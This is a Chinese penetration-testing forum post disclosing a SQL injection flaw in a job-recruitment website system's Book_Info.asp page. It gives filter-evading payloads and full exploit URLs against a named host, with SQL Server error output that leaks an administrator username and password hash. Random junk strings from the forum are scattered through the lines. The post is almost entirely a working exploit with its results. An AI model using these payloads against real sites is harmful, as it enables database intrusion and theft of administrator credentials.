中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]

作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp# j) q! Y' N( j( i3 N2 s6 f. {
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出) V( S, i+ x/ p# `; `0 I! o( d9 q$ u
exp:如下
( h7 f% f) @7 s; P查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)3 {- w7 h2 p( w  I5 Q* F5 z
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ D8 |3 m0 |1 X! thttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& L$ v5 [1 H3 u2 p' I1 qMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
& \, S) k+ k# Q4 f将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 E3 o: J$ F) E8 N9 x* i
/Educate/Book_Info.asp,行 8
" [: x# f+ c7 k/ c' u, Thttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 m; j5 C& ]# UMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'/ C1 p/ E6 H; a
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。1 H" `/ Y5 Y5 |7 F& Q) B
/Educate/Book_Info.asp,行 8




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2